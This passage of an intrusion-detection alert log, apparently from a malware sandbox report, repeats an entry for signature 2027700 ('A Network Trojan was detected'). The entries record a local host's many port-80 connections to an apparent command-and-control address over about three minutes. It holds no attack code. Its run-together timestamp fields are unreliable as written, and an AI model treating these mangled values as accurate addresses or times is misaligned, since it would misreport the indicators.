                              Source Port:50334
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450363802027700 02/07/23-23:10:00.334134
                              SID:2027700
                              Source Port:50363
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450245802027700 02/07/23-23:09:31.338382
                              SID:2027700
                              Source Port:50245
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450458802027700 02/07/23-23:10:25.313774
                              SID:2027700
                              Source Port:50458
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449940802027700 02/07/23-23:08:07.464494
                              SID:2027700
                              Source Port:49940
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449785802027700 02/07/23-23:07:25.161286
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450008802027700 02/07/23-23:08:26.555660
                              SID:2027700
                              Source Port:50008
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450150802027700 02/07/23-23:09:03.798728
                              SID:2027700
                              Source Port:50150
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450452802027700 02/07/23-23:10:23.844381
                              SID:2027700
                              Source Port:50452
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449969802027700 02/07/23-23:08:14.885714
                              SID:2027700
                              Source Port:49969
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450064802027700 02/07/23-23:08:42.089378
                              SID:2027700
                              Source Port:50064
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450208802027700 02/07/23-23:09:20.046231
                              SID:2027700
                              Source Port:50208
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450162802027700 02/07/23-23:09:06.685785
                              SID:2027700
                              Source Port:50162
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450119802027700 02/07/23-23:08:56.055732
                              SID:2027700
                              Source Port:50119
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449944802027700 02/07/23-23:08:08.460141
                              SID:2027700
                              Source Port:49944
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449861802027700 02/07/23-23:07:45.159848
                              SID:2027700
                              Source Port:49861
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450379802027700 02/07/23-23:10:04.185148
                              SID:2027700
                              Source Port:50379
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449855802027700 02/07/23-23:07:43.680992
                              SID:2027700
                              Source Port:49855
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449953802027700 02/07/23-23:08:10.664703
                              SID:2027700
                              Source Port:49953
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449769802027700 02/07/23-23:07:21.212903
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449858802027700 02/07/23-23:07:44.420398
                              SID:2027700
                              Source Port:49858
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450051802027700 02/07/23-23:08:38.908724
                              SID:2027700
                              Source Port:50051
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450175802027700 02/07/23-23:09:11.950103
                              SID:2027700
                              Source Port:50175
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450449802027700 02/07/23-23:10:23.123641
                              SID:2027700
                              Source Port:50449
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449772802027700 02/07/23-23:07:21.956084
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449842802027700 02/07/23-23:07:40.535003
                              SID:2027700
                              Source Port:49842
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449931802027700 02/07/23-23:08:05.263417
                              SID:2027700
                              Source Port:49931
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450277802027700 02/07/23-23:09:39.183924
                              SID:2027700
                              Source Port:50277
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450106802027700 02/07/23-23:08:52.814624
                              SID:2027700
                              Source Port:50106
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450153802027700 02/07/23-23:09:04.508859
                              SID:2027700
                              Source Port:50153
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450420802027700 02/07/23-23:10:14.158819
                              SID:2027700
                              Source Port:50420
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449788802027700 02/07/23-23:07:25.894312
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449699802027700 02/07/23-23:07:02.789716
                              SID:2027700
                              Source Port:49699
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449802802027700 02/07/23-23:07:29.225910
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450130802027700 02/07/23-23:08:58.812897
                              SID:2027700
                              Source Port:50130
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450225802027700 02/07/23-23:09:24.183239
                              SID:2027700
                              Source Port:50225
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450047802027700 02/07/23-23:08:37.932300
                              SID:2027700
                              Source Port:50047
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450399802027700 02/07/23-23:10:09.045857
                              SID:2027700
                              Source Port:50399
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450188802027700 02/07/23-23:09:15.102934
                              SID:2027700
                              Source Port:50188
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449976802027700 02/07/23-23:08:18.678576
                              SID:2027700
                              Source Port:49976
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450403802027700 02/07/23-23:10:09.998024
                              SID:2027700
                              Source Port:50403
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450258802027700 02/07/23-23:09:34.513209
                              SID:2027700
                              Source Port:50258
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449798802027700 02/07/23-23:07:28.267776
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449740802027700 02/07/23-23:07:12.735380
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449891802027700 02/07/23-23:07:52.534100
                              SID:2027700
                              Source Port:49891
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450436802027700 02/07/23-23:10:19.971883
                              SID:2027700
                              Source Port:50436
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449835802027700 02/07/23-23:07:37.902416
                              SID:2027700
                              Source Port:49835
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449719802027700 02/07/23-23:07:07.624988
                              SID:2027700
                              Source Port:49719
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450261802027700 02/07/23-23:09:35.263577
                              SID:2027700
                              Source Port:50261
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450215802027700 02/07/23-23:09:21.772162
                              SID:2027700
                              Source Port:50215
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450083802027700 02/07/23-23:08:46.810774
                              SID:2027700
                              Source Port:50083
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449986802027700 02/07/23-23:08:21.156437
                              SID:2027700
                              Source Port:49986
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450120802027700 02/07/23-23:08:56.307442
                              SID:2027700
                              Source Port:50120
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449845802027700 02/07/23-23:07:41.253266
                              SID:2027700
                              Source Port:49845
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450014802027700 02/07/23-23:08:28.008248
                              SID:2027700
                              Source Port:50014
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449881802027700 02/07/23-23:07:50.123193
                              SID:2027700
                              Source Port:49881
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450037802027700 02/07/23-23:08:33.640087
                              SID:2027700
                              Source Port:50037
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450202802027700 02/07/23-23:09:18.573599
                              SID:2027700
                              Source Port:50202
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450462802027700 02/07/23-23:10:26.316744
                              SID:2027700
                              Source Port:50462
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450248802027700 02/07/23-23:09:32.043752
                              SID:2027700
                              Source Port:50248
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450284802027700 02/07/23-23:09:40.912417
                              SID:2027700
                              Source Port:50284
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449871802027700 02/07/23-23:07:47.646611
                              SID:2027700
                              Source Port:49871
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450413802027700 02/07/23-23:10:12.452915
                              SID:2027700
                              Source Port:50413
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450027802027700 02/07/23-23:08:31.210464
                              SID:2027700
                              Source Port:50027
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450321802027700 02/07/23-23:09:50.021531
                              SID:2027700
                              Source Port:50321
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450198802027700 02/07/23-23:09:17.611552
                              SID:2027700
                              Source Port:50198
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450376802027700 02/07/23-23:10:03.465876
                              SID:2027700
                              Source Port:50376
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450024802027700 02/07/23-23:08:30.495661
                              SID:2027700
                              Source Port:50024
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450205802027700 02/07/23-23:09:19.325527
                              SID:2027700
                              Source Port:50205
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450057802027700 02/07/23-23:08:40.336371
                              SID:2027700
                              Source Port:50057
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449729802027700 02/07/23-23:07:10.061030
                              SID:2027700
                              Source Port:49729
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449907802027700 02/07/23-23:07:59.344645
                              SID:2027700
                              Source Port:49907
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450235802027700 02/07/23-23:09:27.132915
                              SID:2027700
                              Source Port:50235
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449989802027700 02/07/23-23:08:21.900932
                              SID:2027700
                              Source Port:49989
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449848802027700 02/07/23-23:07:41.988753
                              SID:2027700
                              Source Port:49848
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450426802027700 02/07/23-23:10:15.811820
                              SID:2027700
                              Source Port:50426
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450271802027700 02/07/23-23:09:37.717475
                              SID:2027700
                              Source Port:50271
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450100802027700 02/07/23-23:08:51.207785
                              SID:2027700
                              Source Port:50100
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450093802027700 02/07/23-23:08:49.276435
                              SID:2027700
                              Source Port:50093
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450129802027700 02/07/23-23:08:58.570310
                              SID:2027700
                              Source Port:50129
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449730802027700 02/07/23-23:07:10.313178
                              SID:2027700
                              Source Port:49730
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450307802027700 02/07/23-23:09:46.569596
                              SID:2027700
                              Source Port:50307
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450389802027700 02/07/23-23:10:06.609151
                              SID:2027700
                              Source Port:50389
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450139802027700 02/07/23-23:09:01.006926
                              SID:2027700
                              Source Port:50139
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450228802027700 02/07/23-23:09:24.958282
                              SID:2027700
                              Source Port:50228
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449710802027700 02/07/23-23:07:05.446086
                              SID:2027700
                              Source Port:49710
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450090802027700 02/07/23-23:08:48.540226
                              SID:2027700
                              Source Port:50090
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449973802027700 02/07/23-23:08:16.792891
                              SID:2027700
                              Source Port:49973
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450311802027700 02/07/23-23:09:47.562395
                              SID:2027700
                              Source Port:50311
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450396802027700 02/07/23-23:10:08.320217
                              SID:2027700
                              Source Port:50396
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449884802027700 02/07/23-23:07:50.864770
                              SID:2027700
                              Source Port:49884
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450044802027700 02/07/23-23:08:37.214832
                              SID:2027700
                              Source Port:50044
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450222802027700 02/07/23-23:09:23.463165
                              SID:2027700
                              Source Port:50222
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450133802027700 02/07/23-23:08:59.557977
                              SID:2027700
                              Source Port:50133
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449795802027700 02/07/23-23:07:27.539097
                              SID:2027700
                              Source Port:49795
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449838802027700 02/07/23-23:07:39.576743
                              SID:2027700
                              Source Port:49838
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450406802027700 02/07/23-23:10:10.747493
                              SID:2027700
                              Source Port:50406
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449927802027700 02/07/23-23:08:04.272110
                              SID:2027700
                              Source Port:49927
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450317802027700 02/07/23-23:09:49.028783
                              SID:2027700
                              Source Port:50317
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449726802027700 02/07/23-23:07:09.303743
                              SID:2027700
                              Source Port:49726
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449720802027700 02/07/23-23:07:07.869855
                              SID:2027700
                              Source Port:49720
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450475802027700 02/07/23-23:10:29.511990
                              SID:2027700
                              Source Port:50475
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450149802027700 02/07/23-23:09:03.555507
                              SID:2027700
                              Source Port:50149
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450238802027700 02/07/23-23:09:28.505872
                              SID:2027700
                              Source Port:50238
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449749802027700 02/07/23-23:07:14.642908
                              SID:2027700
                              Source Port:49749
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449904802027700 02/07/23-23:07:57.181548
                              SID:2027700
                              Source Port:49904
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450380802027700 02/07/23-23:10:04.421525
                              SID:2027700
                              Source Port:50380
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449815802027700 02/07/23-23:07:32.330392
                              SID:2027700
                              Source Port:49815
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450327802027700 02/07/23-23:09:51.514149
                              SID:2027700
                              Source Port:50327
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450429802027700 02/07/23-23:10:17.103178
                              SID:2027700
                              Source Port:50429
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450291802027700 02/07/23-23:09:42.607617
                              SID:2027700
                              Source Port:50291
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450297802027700 02/07/23-23:09:44.097128
                              SID:2027700
                              Source Port:50297
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450400802027700 02/07/23-23:10:09.283191
                              SID:2027700
                              Source Port:50400
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449822802027700 02/07/23-23:07:34.022866
                              SID:2027700
                              Source Port:49822
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450386802027700 02/07/23-23:10:05.891433
                              SID:2027700
                              Source Port:50386
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449911802027700 02/07/23-23:08:00.309877
                              SID:2027700
                              Source Port:49911
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449736802027700 02/07/23-23:07:11.796309
                              SID:2027700
                              Source Port:49736
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449996802027700 02/07/23-23:08:23.620454
                              SID:2027700
                              Source Port:49996
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449825802027700 02/07/23-23:07:34.754203
                              SID:2027700
                              Source Port:49825
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450110802027700 02/07/23-23:08:53.827948
                              SID:2027700
                              Source Port:50110
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449917802027700 02/07/23-23:08:01.811545
                              SID:2027700
                              Source Port:49917
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449739802027700 02/07/23-23:07:12.501529
                              SID:2027700
                              Source Port:49739
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450370802027700 02/07/23-23:10:02.050258
                              SID:2027700
                              Source Port:50370
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449999802027700 02/07/23-23:08:24.351919
                              SID:2027700
                              Source Port:49999
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449828802027700 02/07/23-23:07:35.504498
                              SID:2027700
                              Source Port:49828
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450416802027700 02/07/23-23:10:13.181627
                              SID:2027700
                              Source Port:50416
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450281802027700 02/07/23-23:09:40.172674
                              SID:2027700
                              Source Port:50281
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450192802027700 02/07/23-23:09:16.124888
                              SID:2027700
                              Source Port:50192
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450021802027700 02/07/23-23:08:29.768912
                              SID:2027700
                              Source Port:50021
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449901802027700 02/07/23-23:07:55.355595
                              SID:2027700
                              Source Port:49901
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449723802027700 02/07/23-23:07:08.598238
                              SID:2027700
                              Source Port:49723
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450212802027700 02/07/23-23:09:21.026369
                              SID:2027700
                              Source Port:50212
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449983802027700 02/07/23-23:08:20.411480
                              SID:2027700
                              Source Port:49983
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450123802027700 02/07/23-23:08:57.096759
                              SID:2027700
                              Source Port:50123
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449812802027700 02/07/23-23:07:31.595526
                              SID:2027700
                              Source Port:49812
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450383802027700 02/07/23-23:10:05.178762
                              SID:2027700
                              Source Port:50383
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449894802027700 02/07/23-23:07:53.270341
                              SID:2027700
                              Source Port:49894
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450301802027700 02/07/23-23:09:45.082072
                              SID:2027700
                              Source Port:50301
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450472802027700 02/07/23-23:10:28.781018
                              SID:2027700
                              Source Port:50472
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450419802027700 02/07/23-23:10:13.897365
                              SID:2027700
                              Source Port:50419
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449914802027700 02/07/23-23:08:01.055769
                              SID:2027700
                              Source Port:49914
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450294802027700 02/07/23-23:09:43.344390
                              SID:2027700
                              Source Port:50294
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450034802027700 02/07/23-23:08:32.903823
                              SID:2027700
                              Source Port:50034
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450329802027700 02/07/23-23:09:52.020233
                              SID:2027700
                              Source Port:50329
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449906802027700 02/07/23-23:07:58.951742
                              SID:2027700
                              Source Port:49906
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450295802027700 02/07/23-23:09:43.610527
                              SID:2027700
                              Source Port:50295
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450099802027700 02/07/23-23:08:50.963558
                              SID:2027700
                              Source Port:50099
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449872802027700 02/07/23-23:07:47.908431
                              SID:2027700
                              Source Port:49872
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450038802027700 02/07/23-23:08:34.135275
                              SID:2027700
                              Source Port:50038
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450234802027700 02/07/23-23:09:26.686624
                              SID:2027700
                              Source Port:50234
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450430802027700 02/07/23-23:10:18.142734
                              SID:2027700
                              Source Port:50430
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449811802027700 02/07/23-23:07:31.352080
                              SID:2027700
                              Source Port:49811
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
